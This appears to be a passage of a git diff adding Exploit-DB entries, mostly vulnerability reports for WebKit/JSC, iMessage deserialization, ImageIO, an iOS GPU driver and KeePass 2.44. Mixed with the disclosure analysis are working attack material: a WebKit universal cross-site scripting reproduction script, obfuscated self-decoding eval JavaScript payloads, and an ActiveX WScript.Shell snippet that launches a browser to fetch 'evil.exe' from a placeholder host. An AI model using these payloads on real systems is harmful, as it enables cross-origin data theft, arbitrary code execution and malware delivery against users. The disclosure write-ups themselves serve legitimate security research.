+    7   0x4d8af2e06484
+    8   0x4d8af2e034c3
+    9   0x1078661b7 llint_entry
+    10  0x107848f70 vmEntryToJavaScript
+    11  0x107740047 JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*)
+    12  0x10773f650 JSC::Interpreter::executeProgram(JSC::SourceCode const&, JSC::ExecState*, JSC::JSObject*)
+    13  0x107a9afc5 JSC::evaluate(JSC::ExecState*, JSC::SourceCode const&, JSC::JSValue, WTF::NakedPtr<JSC::Exception>&)
+    14  0x1039549a6 runWithOptions(GlobalObject*, CommandLine&, bool&)
+    15  0x10392a10c jscmain(int, char**)::$_4::operator()(JSC::VM&, GlobalObject*, bool&) const
+    16  0x103909aff int runJSC<jscmain(int, char**)::$_4>(CommandLine const&, bool, jscmain(int, char**)::$_4 const&)
+    17  0x103908893 jscmain(int, char**)
+    18  0x10390880e main
+    19  0x7fff79ad63d5 start
+
+The assertion indicates a type confusion. In particular, setCallee stores a JSCell into a WriteBarrier<JSFunction> which is not actually a JSFunction, triggering this assertion.
+
+Below is my preliminary analysis of the bug.
+
+When DFG compiles v11, it decides to inline v23 and the isFinite function. The relevant parts of the resulting DFG graph (with many omissions) follow:
+
+ # Inlined v23
+     2  0:   --> v23#EOpuso:<0x1078a43c0, bc#222, Call, closure call, numArgs+this = 3, numFixup = 0, stackOffset = -26 (loc0 maps to loc26)>
+ 38  2  0:    207:< 1:->	GetScope(Check:Untyped:@169, JS|PureInt, R:Stack(-23), bc#1, ExitValid)
+ 39  2  0:    208:<!0:->	MovHint(Check:Untyped:@207, MustGen, loc30, R:Stack(-23), W:SideState, ClobbersExit, bc#1, ExitValid)
+ 40  2  0:    209:< 1:->	SetLocal(Check:Untyped:@207, loc30(QC~/FlushedJSValue), R:Stack(-23), W:Stack(-31), bc#1, exit: bc#222 --> v23#EOpuso:<0x1078a43c0> (closure) bc#3, ExitValid)  predicting None
+
+ 44  2  0:    213:< 1:->	CreateDirectArguments(JS|PureInt, R:Stack,Stack(-23),HeapObjectCount, W:HeapObjectCount, Exits, ClobbersExit, bc#7, ExitValid)
+ 45  2  0:    214:<!0:->	MovHint(Check:Untyped:@213, MustGen, loc32, R:Stack(-23), W:SideState, ClobbersExit, bc#7, ExitInvalid)
+ 46  2  0:    215:< 1:->	SetLocal(Check:Untyped:@213, loc32(SC~/FlushedJSValue), R:Stack(-23), W:Stack(-33), bc#7, exit: bc#222 --> v23#EOpuso:<0x1078a43c0> (closure) bc#9, ExitValid)  predicting None
+     2  0:   <-- v23#EOpuso:<0x1078a43c0, bc#222, Call, closure call, numArgs+this = 3, numFixup = 0, stackOffset = -26 (loc0 maps to loc26)>
+
+     4  0: Block #4 (bc#317): (OSR target)
+ 24  4  0:  322:< 1:->	JSConstant(JS|PureInt, Weak:Object: 0x1078e4000 with butterfly 0x18052e8408 (Structure %C0:global), StructureID: 40546, bc#347, ExitValid)
+ 27  4  0:  325:< 1:->	SetLocal(Check:Untyped:@322, loc30(DE~/FlushedJSValue), W:Stack(-31), bc#347, exit: bc#354, ExitValid)  predicting None
+
+ # Inlined isFinite()
+     4  0:   --> isFinite#DJEgRe:<0x1078a4640 (StrictMode), bc#362, Call, known callee: Object: 0x1078cfd50 with butterfly 0x0 (Structure %Cm:Function), StructureID: 63290, numArgs+this = 1, numFixup = 1, stackOffset = -38 (loc0 maps to loc38)>
+ 37  4  0:    335:< 1:->	JSConstant(JS|PureInt, Undefined, bc#0, ExitValid)
+ 38  4  0:    336:<!0:->	MovHint(Check:Untyped:@322, MustGen, loc32, W:SideState, ClobbersExit, bc#0, ExitValid)
+ 41  4  0:    339:< 1:->	SetLocal(Check:Untyped:@322, loc32(FE~/FlushedJSValue), W:Stack(-33), bc#0, ExitValid)  predicting None
+
+Note that some bytecode registers (locX) are reused to hold different values in this code.
+
+The DFGPhantomInsertionPhase is responsible for identifying bytecode registers (locX) that have to be recovered during a bailout and placing Phantom nodes into the IR to ensure the required DFG values are alive so the bytecode registers can be restored from them. When the DFGPhantomInsertionPhase phase runs on this code and wants to determine the values needed for a bailout somewhere at the start of the try block, it decides that loc32 would have to be restored as it is assigned above but still used further down (in the inlined code of isFinite). As such, it inserts a Phantom node. When the bailout then actually happens (presumably because the `new Function()` fails), loc32 is attempted to be restored (by then, CreateDirectArguments has been replaced by a PhantomCreateDirectArguments which doesn't actually create the arguments object unless a bailout happens), resulting in a call to operationCreateDirectArgumentsDuringExit. This call requires the value of `callee` as argument. As such, the callee value is reconstructed as well. In the inlined callframe, the callee value is expected to be stored in loc30 (I think). However, by the time the bailout happens, loc30 has been reused, in this case by storing the global object into it. As such, the code that recovers the values (incorrectly) restores the callee value to the global object and passes it to operationCreateDirectArgumentsDuringExit. When this reference is then stored into a WriteBarrier<JSFunction> during a call to setCallee, an assertion is raised in debug builds. It is not clear to me at which point a different decision should have been made here.
+
+Unfortunately, it is quite tedious to manually modify this sample as most changes to it will quickly break the specific bytecode register allocation outcome required to trigger the bug. I could imagine this bug to be exploitable if the invalid callee value is somehow subsequently accessed by code, e.g. user supplied code, the GC, or other parts of the engine that inspect bytecode registers, and assumed to be a JSFunction*. However, I have not verified that this is possible.
\ No newline at end of file
diff --git a/exploits/multiple/dos/47591.txt b/exploits/multiple/dos/47591.txt
new file mode 100644
index 000000000..4a1da292c
--- /dev/null
+++ b/exploits/multiple/dos/47591.txt
@@ -0,0 +1,105 @@
+VULNERABILITY DETAILS
+```
+bool JSObject::putInlineSlow(ExecState* exec, PropertyName propertyName, JSValue value, PutPropertySlot& slot)
+{
+    ASSERT(!isThisValueAltered(slot, this));
+
+    VM& vm = exec->vm();
+    auto scope = DECLARE_THROW_SCOPE(vm);
+
+    JSObject* obj = this;
+    for (;;) {
+        unsigned attributes;
+        PropertyOffset offset = obj->structure(vm)->get(vm, propertyName, attributes); // ***1***
+        if (isValidOffset(offset)) {
+            if (attributes & PropertyAttribute::ReadOnly) {
+                ASSERT(this->prototypeChainMayInterceptStoreTo(vm, propertyName) || obj == this);
+                return typeError(exec, scope, slot.isStrictMode(), ReadonlyPropertyWriteError);
+            }
+
+            JSValue gs = obj->getDirect(offset);
+            if (gs.isGetterSetter()) {
+                // We need to make sure that we decide to cache this property before we potentially execute aribitrary JS.
+                if (!structure(vm)->isDictionary())
+                    slot.setCacheableSetter(obj, offset);
+
+                bool result = callSetter(exec, slot.thisValue(), gs, value, slot.isStrictMode() ? StrictMode : NotStrictMode); // ***2***
+                RETURN_IF_EXCEPTION(scope, false);
+                return result;
+            }
+            if (gs.isCustomGetterSetter()) {
+                // We need to make sure that we decide to cache this property before we potentially execute aribitrary JS.
+                if (attributes & PropertyAttribute::CustomAccessor)
+                    slot.setCustomAccessor(obj, jsCast<CustomGetterSetter*>(gs.asCell())->setter());
+                else
+                    slot.setCustomValue(obj, jsCast<CustomGetterSetter*>(gs.asCell())->setter());
+
+                bool result = callCustomSetter(exec, gs, attributes & PropertyAttribute::CustomAccessor, obj, slot.thisValue(), value);
+                RETURN_IF_EXCEPTION(scope, false);
+                return result;
+            }
+            ASSERT(!(attributes & PropertyAttribute::Accessor));
+
+            // If there's an existing property on the object or one of its 
+            // prototypes it should be replaced, so break here.
+            break;
+        }
+[...]
+        JSValue prototype = obj->getPrototype(vm, exec);
+        RETURN_IF_EXCEPTION(scope, false);
+        if (prototype.isNull())
+            break;
+        obj = asObject(prototype);
+    }
+```
+
+This is an extension of https://bugs.chromium.org/p/project-zero/issues/detail?id=1240.
+`putInlineSlow` and `putToPrimitive` now call the access-checked `getPrototype` method instead of
+`getPrototypeDirect`. However, they still use `Structure::get` directly[1], which bypasses access
+checks implemented in functions that override `JSObject::put`. Thus, an attacker can put a
+cross-origin object into the prototype chain of a regular object and trigger the invocation of a
+cross-origin setter. If the setter raises an exception while processing the passed value, it's
+possible to leak the exception object and gain access to, e.g., another window's function
+constructor.
+
+Since this issue is only exploitable when a victim page defines a custom accessor property on the
+`location` object, its practical impact is minimal.
+
+
+VERSION
+WebKit revision 247430 
+Safari version 12.1.1 (14607.2.6.1.1)
+
+
+REPRODUCTION CASE
+<body>
+<script>
+frame = document.body.appendChild(document.createElement('iframe'));
+frame.src = `data:text/html,
+  <h1>secret data</h1>
+  <script>
+    location.__defineSetter__('foo', function(value) {
+      alert('Received value: ' + value);
+    });
+  </s` + `cript>`;
+
+function turnLeakedExceptionIntoUXSS(object) {
+  try {
+    object.foo = {toString: function() { return {} } };
+  } catch (e) {
+    let func = e.constructor.constructor;
+    func('alert(document.body.innerHTML)')();
+  }
+}
+
+frame.onload = () => {
+  // putInlineSlow
+  turnLeakedExceptionIntoUXSS({__proto__: frame.contentWindow.location});
+
+  // putToPrimitive
+  num = 1337;
+  num.__proto__.__proto__ = frame.contentWindow.location;
+  turnLeakedExceptionIntoUXSS(num);
+}
+</script>
+</body>
\ No newline at end of file
diff --git a/exploits/multiple/dos/47608.txt b/exploits/multiple/dos/47608.txt
new file mode 100644
index 000000000..57da2e696
--- /dev/null
+++ b/exploits/multiple/dos/47608.txt
@@ -0,0 +1,94 @@
+During processing of incoming iMessages, attacker controlled data is deserialized using the
+NSUnarchiver API. One of the classes that is allowed to be decoded from the incoming data is
+NSDictionary. However, due to the logic of NSUnarchiver, all subclasses of NSDictionary that also
+implement secure coding can then be deserialized as well. NSSharedKeyDictionary is an example of
+such a subclass. A NSSharedKeyDictionary is a dictionary for which, for performance reasons, the
+keys are predefined using a NSSharedKeySet.
+
+A NSSharedKeyDictionary is essentially a linear array of values and a pointer to its
+NSSharedKeySet. An NSSharedKeySet on the other hand looks roughly like this (with some fields
+omitted for simplicity and translated to pseudo-C):
+
+struct NSSharedKeySet {
+    unsigned int _numKeys;   // The number of keys in the _keys array
+    id* _keys;              // A pointer to an array containing the key values
+    unsigned int _rankTable;    // A table basically mapping the hashes of
+                                // the keys to an index into _keys
+    unsigned int _M;        // The size of the _rankTable
+    unsigned int _factor;   // Used to compute the index into _rankTable from a hash.
+    NSSharedKeySet* _subKeySet; // The next KeySet in the chain
+};
+
+The value lookup on an NSSharedKeyDictionary then works roughly as follows:
+* NSSharedKeyDictionary invokes [NSSharedKeySet indexForKey:] on its associated keySet
+* indexForKey: computes the hash of the key, basically computes rti = hash % _factor, bounds-checks
+  that against _M, and finally uses it to lookup the index in its rankTable: idx = _rankTable[rti]
+* It verifies that idx < _numKeys
+* It loads _keys[idx] and invokes [key isEqual:candidate] with it as argument
+* If the result is true, the index has been found and is returned to the NSSharedKeyDictionary where
+  it is used to index into its values array
+* If not, indexForKey: recursively processes the subKeySet in the same way until it either finds the
+  key or there is no subKeySet left, in which case it returns -1
+
+The NSArchiver format is powerful enough to allow reference cycles between decoded objects.
+This now enables the following attack:
+
+SharedKeyDictionary1 --[ keySet ]-> SharedKeySet1 --[ subKeySet ]-> SharedKeySet2 --+
+                                          ^                                         |
+                                          |                                    [ subKeySet ]
+                                          |                                         |
+                                          +-----------------------------------------+
+
+What will happen now is the following:
+
+* The SharedKeyDictionary1 is decoded and its initWithCoder: executed
+* [NSSharedKeyDictionary initWithCoder:] decodes its _keySet, which is SharedKeySet1
+* The [NSSharedKeySet initWithCoder:] for SharedKeyDictionary1 reads and initializes the following fields:
+    * _numKeys, which at this point is unchecked and can be any unsigned integer value.
+      Only later will it be checked to be equal to the number of keys in the _keys array.
+    * _rankTable, with completely attacker controlled content
+    * _M, which must be equal to the size of the _rankTable
+    * _factor, which must be a prime but otherwise can be arbitrarily chosen
+  At this point, _numKeys = 0xffffffff but _keys is still nullptr (because ObjC objects are
+  allocated with calloc)
+* Next, *before* initializing _keys, it deserializes the _subKeySet, SharedKeySet2
+* [NSSharedKeySet initWithCoder:] of SharedKeySet2 finishes, and at the end verifies that
+  it is a valid SharedKeySet. It does that by checking that all its keys correctly map to an index.
+  For that it calls [NSSharedKeySet indexForKey:] on itself for every key.
+* (At least) one of the keys will, however, not be found on SharedKeySet2. As such,
+  indexForKey: will proceed to search for the key in its _subKeySet, which is actually SharedKeySet1
+* The lookup proceeds and determines that the index should be (in our case) 2189591170, which is
+  less than SharedKeySet1->numKey (which is still 0xffffffff)
+* It then loads SharedKeySet1->keys[2189591170], which, as ->_keys is still nullptr, reads an
+  objc_object* from 0x414141410 and thus crashes
+
+The attached PoC demonstrates this on the latest macOS 10.14.6
+
+> clang -o tester tester.m -framework Foundation
+> ./generator.py
+> lldb -- ./tester payload.xml
+(lldb) target create "./tester"
+Current executable set to './tester' (x86_64).
+(lldb) settings set -- target.run-args  "payload.xml"
+(lldb) r
+2019-07-29 15:40:28.989305+0200 tester[71168:496831] Let's go
+Process 71168 stopped
+* thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0x414141410)
+    frame #0: 0x00007fff3390d3e7 CoreFoundation`-[NSSharedKeySet indexForKey:] + 566
+CoreFoundation`-[NSSharedKeySet indexForKey:]:
+->  0x7fff3390d3e7 <+566>: mov    rdx, qword ptr [rax + 8*r13]
+
+
+Combined with a heap spray, this bug could likely be remotely exploitable.
+
+Ideally, this issue and similar ones can be prevented by removing the NSSharedKeyDictionary attack
+surface completely, as originally suggested by Natalie. Alternatively, I think another solution
+might be to stop encoding all the internal fields of the NSSharedKeyDictionary/NSSharedKeySet
+(rankTable, numKeys, especially the subKeySet, ...) and only encode the keys and values. The new
+[initWithCoder:] implementations could then just call +[NSSharedKeySet keySetWithKeys:] and
++[NSSharedKeyDictionary sharedKeyDictionaryWithKeySet:] to construct new instances with the decoded
+keys and values. This should be fine as all the other fields are implementation details anyway.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47608.zip
\ No newline at end of file
diff --git a/exploits/multiple/dos/47952.txt b/exploits/multiple/dos/47952.txt
new file mode 100644
index 000000000..826ef9c12
--- /dev/null
+++ b/exploits/multiple/dos/47952.txt
@@ -0,0 +1,109 @@
+# Exploit Title : KeePass 2.44 - Denial of Service (PoC)
+# Product : KeePass Password Safe
+# Version : < 2.44
+# Date: 2020-01-22
+# Vendor Homepage: https://keepass.info/
+# Exploit Author: Mustafa Emre Gül
+# Website: https://emregul.com.tr/
+# Tested On : Win10 x64
+# Description : The free, open source, light-weight and easy-to-use password manager.
+
+
+PoC:
+Open KeePass > Help > About KeePass > Help (any local help area) >
+Drag&Drop HTML File
+
+Save the contents to html.
+
+
+Payload-1:
+(DoS & Run Cmd)
+
+<script type="text/javascript">
+//<![CDATA[
+<!--
+var x="function f(x){var i,o=\"\",l=x.length;for(i=l-1;i>=0;i--) {try{o+=x.c" +
+"harAt(i);}catch(e){}}return o;}f(\")\\\"function f(x,y){var i,o=\\\"\\\\\\\""+
+"\\\\,l=x.length;for(i=0;i<l;i++){if(i==28)y+=i;y%=127;o+=String.fromCharCod" +
+"e(x.charCodeAt(i)^(y++));}return o;}f(\\\"\\\\xr}jMDLW\\\\\\\\nRTN\\\\\\\\\\"+
+"\\\\\\LFE\\\\\\\\004\\\\\\\\017\\\\\\\\022GD\\\\\\\\\\\\\\\\^\\\\\\\\rhGjYh" +
+"83#9y2/(-s:\\\\\\\\021\\\\\\\\024\\\\\\\\013\\\\\\\\025Y9D\\\\\\\\037E\\\\\\"+
+"\\034\\\\\\\\013F\\\\\\\\017\\\\\\\\002\\\\\\\\003\\\\\\\\037\\\\\\\\021\\\\"+
+"\\\\005\\\\\\\\033\\\\\\\\021\\\\\\\\030\\\\\\\\020*UX\\\\\\\\032\\\\\\\\02" +
+"5\\\\\\\\025\\\\\\\\010\\\\\\\\030\\\\\\\\020t<^!M@;?T+4W~Q`3}tfr4}bch4\\\\" +
+"\\\\177jith\\\\\\\\\\\"\\\\|\\\\\\\\003g[TLTB[u\\\\\\\\010\\\\\\\\013OB@[U_" +
+"F\\\\\\\\016h\\\\\\\\027\\\\\\\\033\\\\\\\\006d\\\\\\\\033\\\\\\\\004gNaP\\" +
+"\\\\\\003\\\\\\\\\\\"\\\\.&:z\\\\\\\\0314\\\\\\\\033&u9(>$>;p=3=3 70=d\\\\\\"+
+"\\006y\\\\\\\\n\\\\\\\\037\\\\\\\\r<\\\\\\\\022\\\\\\\\010\\\\\\\\022\\\\\\" +
+"\\027J \\\\\\\\010\\\\\\\\004\\\\\\\\007\\\\\\\\r\\\\\\\\0177NS2\\\\\\\\035" +
+",\\\\\\\\037.\\\\\\\\001(\\\\\\\\033VWX=\\\\\\\\023\\\\\\\\026\\\\\\\\\\\\\\"+
+"\\\\\\\\\\016\\\\\\\\026l!\\\\\\\\\\\"\\\\_vYh'()Ynx-}g|1/3Wgsvl|Uyvx}k\\\\" +
+"\\\\010}\\\\\\\\000tWFTNX]\\\\\\\\004xDHBCl\\\\\\\\023\\\\\\\\033\\\\\\\\02" +
+"3\\\\\\\\024iDkV\\\\\\\\031\\\\\\\\032\\\\\\\\033\\\\\\\\177\\\\\\\\\\\\\\\\"+
+"RS`2*/j\\\\\\\\0273)`\\\\\\\\025h\\\\\\\\027n\\\\\\\\021l,=5|6,0\\\\\\\\nu\\"+
+"\\\\\\004{\\\\\\\\006yu}~\\\\\\\\003\\\\\\\\022=\\\\\\\\014CDE5\\\\\\\\002\\"+
+"\\\\\\034I\\\\\\\\031\\\\\\\\003\\\\\\\\000MSO>\\\\\\\\036\\\\\\\\006\\\\\\" +
+"\\033\\\\\\\\035\\\\\\\\033\\\\\\\\021WXYZ'\\\\\\\\016!\\\\\\\\020 !\\\\\\\\"+
+"\\\"\\\\_vYh;'ziye}z1LcN}(:tx|`$GnAp#\\\\\\\\017IVNH\\\\\\\\033\\\\\\\\004\\"+
+"\\\\\\016\\\\\\\\023\\\\\\\\031\\\\\\\\021\\\"\\\\,28)\\\"(f};)lo,0(rtsbus." +
+"o nruter};)i(tArahc.x=+o{)--i;0=>i;1-l=i(rof}}{)e(hctac};l=+l;x=+x{yrt{)401" +
+"=!)31/l(tAedoCrahc.x(elihw;lo=l,htgnel.x=lo,\\\"\\\"=o,i rav{)x(f noitcnuf\""+
+")"                                                                           ;
+while(x=eval(x));
+//-->
+//]]>
+</script>
+<script type="text/javascript">
+//<![CDATA[
+<!--
+var x="function f(x){var i,o=\"\",ol=x.length,l=ol;while(x.charCodeAt(l/13)!" +
+"=48){try{x+=x;l+=l;}catch(e){}}for(i=l-1;i>=0;i--){o+=x.charAt(i);}return o" +
+".substr(0,ol);}f(\")19,\\\"ZPdw771\\\\b77-0xjk-7=3771\\\\sp,cw$520\\\\:330\\"+
+"\\xg030\\\\jj9%530\\\\b000\\\\XZUUVX620\\\\LP\\\\\\\\Pr\\\\610\\\\KOHD400\\" +
+"\\620\\\\720\\\\\\\\\\\\WOWGPr\\\\530\\\\NClAauFkD,$gqutdr/3-ig~`|)rkanwbo2" +
+"30\\\\t\\\\ 520\\\\&310\\\\$n\\\\200\\\\)230\\\\/000\\\\-K530\\\\310\\\\310" +
+"\\\\n\\\\630\\\\010\\\\IULFW620\\\\600\\\\400\\\\700\\\\520\\\\=*100\\\\(70" +
+"0\\\\4500\\\\*310\\\\-u}xy8pt~}|{771\\\\itg/e771\\\\sb|`V620\\\\530\\\\NT\\" +
+"\\\\\\MdYjGh010\\\\@TVI[O410\\\\620\\\\n\\\\330\\\\ZB@CQA200\\\\SAijArGhEec" +
+"J{HaN*2S?9t)V)5,&waedtbn\\\\!010\\\\'420\\\\%n\\\\+r\\\\U]XY030\\\\PT^]\\\\" +
+"\\\\[ZY]GZEr\\\\CYQ@b~4|);/pw$:2'610\\\\?410\\\\=220\\\\vn720\\\\h520\\\\hz" +
+"f7!%$4\\\"\\\\730\\\\L\\\\\\\\JOfWdEjN420\\\\230\\\\230\\\\IU710\\\\@BE_IG]" +
+"AHyV771\\\\430\\\\300\\\\|kntnxixnv|:`kwe2S3h|r~)|wowgp>o\\\\\\\\410\\\\!B7" +
+"30\\\\330\\\\430\\\\020\\\\K030\\\\)600\\\\/L530\\\\530\\\\330\\\\600\\\\QN" +
+"C400\\\\500\\\\r\\\\320\\\\710\\\\720\\\\320\\\\M620\\\\710\\\\500\\\\2+>3?" +
+"\\\"(f};o nruter};))++y(^)i(tAedoCrahc.x(edoCrahCmorf.gnirtS=+o;721=%y{)++i" +
+";l<i;0=i(rof;htgnel.x=l,\\\"\\\"=o,i rav{)y,x(f noitcnuf\")"                 ;
+while(x=eval(x));
+//-->
+//]]>
+</script>
+
+
+
+Payload-2:
+(run iexplorer.exe & download infected file)
+
+<html><body>
+<script>
+function exec(cmdline, params) {
+  var fso = new ActiveXObject("Scripting.FileSystemObject");
+  fileExist = fso.FileExists(cmdline);
+  if (!fileExist) {
+    alert("The requested application is not installed.");
+  }
+  else {
+    var shell = new ActiveXObject( "WScript.Shell" );
+    if (params) {
+        params = ' ' + params;
+    }
+    else {
+        params = '';
+    }
+    shell.Run('"' + cmdline + '"' + params);
+  }
+}
+</script>
+<a href="javascript:exec('C:\\Program Files\\Internet
+Explorer\\iexplore.exe', '-nomerge
+http://ipaddress/evil.exe');">Edition Mode Active</a>
+ </body></html>
\ No newline at end of file
diff --git a/exploits/multiple/dos/47970.txt b/exploits/multiple/dos/47970.txt
new file mode 100644
index 000000000..6f0e2692f
--- /dev/null
+++ b/exploits/multiple/dos/47970.txt
@@ -0,0 +1,55 @@
+The attached tiff image causes a crash in ImageIO on the latest macOS and iOS. To reproduce the issue, the attached code (tester.m) can be used. I've attached another code snippet to reproduce the issue on iOS as well. With tester.m compiled with ASAN, processing the attached tiff image should crash with an access violation similar to the following:
+
+    % ./tester fuzzed.tif
+    AddressSanitizer:DEADLYSIGNAL
+    =================================================================
+    ==70578==ERROR: AddressSanitizer: SEGV on unknown address 0x00010decf000 (pc 0x7fff3a588390 bp 0x7ffee8fbb6d0 sp 0x7ffee8fbb0e0 T0)
+    ==70578==The signal is caused by a WRITE memory access.
+        #0 0x7fff3a58838f in invocation function for block in TIFFReadPlugin::DecodeBlocks(IIOImageRead*, GlobalTIFFInfo*, ReadPluginData const&, TIFFPluginData const&, std::__1::vector<IIODecodeFrameParams, std::__1::allocator<IIODecodeFrame
+    Params> >&) (ImageIO:x86_64h+0xab38f)
+        #1 0x7fff6e8ca512 in _dispatch_client_callout2 (libdispatch.dylib:x86_64+0x3512)
+        #2 0x7fff6e8dabcb in _dispatch_apply_serial (libdispatch.dylib:x86_64+0x13bcb)
+        #3 0x7fff6e8ca4dd in _dispatch_client_callout (libdispatch.dylib:x86_64+0x34dd)
+        #4 0x7fff6e8cde62 in _dispatch_sync_function_invoke (libdispatch.dylib:x86_64+0x6e62)
+        #5 0x7fff6e8daaf4 in dispatch_apply_f (libdispatch.dylib:x86_64+0x13af4)
+        #6 0x7fff3a587028 in TIFFReadPlugin::CallDecodeBlocks(IIOImageRead*, GlobalTIFFInfo*, ReadPluginData const&, TIFFPluginData const&, IIORequest, std::__1::vector<IIODecodeFrameParams, std::__1::allocator<IIODecodeFrameParams> >&) (Imag
+    eIO:x86_64h+0xaa028)
+        #7 0x7fff3a513f29 in TIFFReadPlugin::copyImageBlockSet(InfoRec*, CGImageProvider*, CGRect, CGSize, __CFDictionary const*) (ImageIO:x86_64h+0x36f29)
+        #8 0x7fff3a4f7a1d in IIO_Reader::CopyImageBlockSetProc(void*, CGImageProvider*, CGRect, CGSize, __CFDictionary const*) (ImageIO:x86_64h+0x1aa1d)
+        #9 0x7fff3a4f6dfe in IIOImageProviderInfo::CopyImageBlockSetWithOptions(void*, CGImageProvider*, CGRect, CGSize, __CFDictionary const*) (ImageIO:x86_64h+0x19dfe)
+        #10 0x7fff37a9eb13 in imageProvider_retain_data (CoreGraphics:x86_64h+0x3cb13)
+        #11 0x7fff37a9ea8f in CGDataProviderRetainData (CoreGraphics:x86_64h+0x3ca8f)
+        #12 0x7fff37a9eab1 in provider_for_destination_retain_data (CoreGraphics:x86_64h+0x3cab1)
+        #13 0x7fff37a9ea8f in CGDataProviderRetainData (CoreGraphics:x86_64h+0x3ca8f)
+        #14 0x7fff37a9e949 in CGAccessSessionCreate (CoreGraphics:x86_64h+0x3c949)
+        #15 0x7fff37a9cb8c in img_data_lock (CoreGraphics:x86_64h+0x3ab8c)
+        #16 0x7fff37a9839a in CGSImageDataLock (CoreGraphics:x86_64h+0x3639a)
+        #17 0x7fff37a97d92 in RIPImageDataInitializeShared (CoreGraphics:x86_64h+0x35d92)
+        #18 0x7fff37a97951 in RIPImageCacheGetRetained (CoreGraphics:x86_64h+0x35951)
+        #19 0x7fff37a97426 in ripc_AcquireRIPImageData (CoreGraphics:x86_64h+0x35426)
+        #20 0x7fff37a966eb in ripc_DrawImage (CoreGraphics:x86_64h+0x346eb)
+        #21 0x7fff37a95a1f in CGContextDrawImageWithOptions (CoreGraphics:x86_64h+0x33a1f)
+        #22 0x106c42aab in main (tester:x86_64+0x100001aab)
+        #23 0x7fff6e91a404 in start (libdyld.dylib:x86_64+0x11404)
+
+    ==70578==Register values:
+    rax = 0xffffffffffffff01  rbx = 0x0000800080008080  rcx = 0x0000000000000080  rdx = 0x0000000000000008
+    rdi = 0x0000000000000000  rsi = 0x0000000000000000  rbp = 0x00007ffee8fbb6d0  rsp = 0x00007ffee8fbb0e0
+     r8 = 0x0000632000003002   r9 = 0x00000000000000ff  r10 = 0x0000800080008080  r11 = 0xfffffffffffffff0
+    r12 = 0x0000000000000001  r13 = 0x000000010decf000  r14 = 0x0000000000000008  r15 = 0x0000000000000000
+    AddressSanitizer can not provide additional info.
+    SUMMARY: AddressSanitizer: SEGV (ImageIO:x86_64h+0xab38f) in invocation function for block in TIFFReadPlugin::DecodeBlocks(IIOImageRead*, GlobalTIFFInfo*, ReadPluginData const&, TIFFPluginData const&, std::__1::vector<IIODecodeFrameParams
+    , std::__1::allocator<IIODecodeFrameParams> >&)
+    ==70578==ABORTING
+
+The overflow happens out of an mmap region as the memory buffer is allocated using ImageIO_Malloc, which is itself mostly a thin wrapper around mmap.
+
+The crashing image was found through fuzzing and both the crashing as well as the original image are attached. The relevant byte change removes the BitsPerSample entry (original value is 8) from the TIFF file, in which case a default value of 1 will be used. As the SamplesPerPixel entry is still 3, the image will contain 3 bits per pixel, one for the red, one for the green, and one for the blue component. ImageIO will then allocate width*height*3 bytes of memory (for a RBG bitmap) using ImageIO_Malloc, then call TIFFReadPlugin::DecodeBlocks to write the image data into the buffer. Next, ImageIO uses the tile-oriented TIFF api [1] to read out a tile of the image in its current encoding (3 bits per pixel). The default tile size seems to be 0x100 x 0x100 and so the entire image (which is 143 x 190 pixels large) fits into one tile. Since there are three bits per pixel, the tile has a total of 0x100*0x100*3/8 = 0x6000 bytes, which is what TIFFReadTile returns. Finally, it appears that ImageIO then uses the returned size (0x6000) to decode the image instead of the correct image size (143 x 190). As such, it writes 0x6000*8 bytes (since the output format uses 8 bits per component, not 1) to the output buffer, or about 2.4 times the allocated size. The program then crashes with a memory violation.
+
+Since the buffer is already allocated using mmap, adding a guard page after it would likely prevent this and similar bugs from being exploitable in the future.
+
+The attached archive contains the original image and the mutated one causing the crash. It also contains code to reproduce the issue on macOS and iOS. Finally, it contains a python script to change the byte in question in the original file to remove the BitsPerSample entry and thus trigger the issue.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47970.zip
\ No newline at end of file
diff --git a/exploits/multiple/dos/48035.txt b/exploits/multiple/dos/48035.txt
new file mode 100644
index 000000000..1104de924
--- /dev/null
+++ b/exploits/multiple/dos/48035.txt
@@ -0,0 +1,11 @@
+While investigating possible shared memory issues in AGXCommandQueue::processSegmentKernelCommand(), I noticed that the size checks used to parse the IOAccelKernelCommand in IOAccelCommandQueue2::processSegmentKernelCommand() are incorrect. The IOAccelKernelCommand contains an 8-byte header consisting of a command type and size, followed by structured data specific to the type of command. When verifying that the size of the IOAccelKernelCommand has enough data for the specific command type, it appears that the check excludes the size of the 8-byte header, meaning that processSegmentKernelCommand() will parse up to 8 bytes of out-of-bounds data.
+
+Normally I wouldn't consider this very security-relevant. However, command type 2 corresponds to kIOAccelKernelCommandCollectTimeStamp, which actually *writes* into the OOB memory rather than just parsing data from it. (The IOAccelKernelCommand is being parsed from shared memory, so the write is visible to userspace.) This makes it possible to overwrite the first 1-8 bytes of the subsequent page of memory with timestamp data.
+
+The attached POC should trigger the issue on iOS 13. Tested on iPod9,1 17B111. I haven't tested on macOS, but it looks like the issue is present there as well.
+
+I'll also tack on to this issue that on the whole AGXCommandQueue seems to do a poor job of treating shared memory as volatile, and I suspect that there are further issues here that are worth looking into. For example, when IOAccelKernelCommand's type is 0x10000, AGXCommandQueue::processSegmentKernelCommand() does not use the fourth parameter (which points to the end of the IOAccelKernelCommand as parsed by IOAccelCommandQueue2::processSegmentKernelCommands()) except when passing it to IOAccelCommandQueue2::processSegmentKernelCommand(), instead double-fetching the command size from shared memory to verify that all the command data is in-bounds. Thus, I believe it's possible to make AGXCommandQueue::processSegmentKernelCommand() parse out-of-bounds data, although I have not found a way to turn this into an interesting exploitation primitive. I don't think the shared memory issues are isolated to this function either. For example, there used to be much more readily exploitable double-fetches in AGXAllocationList2::initWithSharedResourceList(), although these were fixed sometime between 16A5288q and 16G77.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48035.zip
\ No newline at end of file
diff --git a/exploits/openbsd/local/45922.sh b/exploits/multiple/local/45922.sh
similarity index 100%
rename from exploits/openbsd/local/45922.sh
rename to exploits/multiple/local/45922.sh
diff --git a/exploits/multiple/local/46727.rb b/exploits/multiple/local/46727.rb
new file mode 100755
index 000000000..c0e11a6ce
--- /dev/null
+++ b/exploits/multiple/local/46727.rb
@@ -0,0 +1,115 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
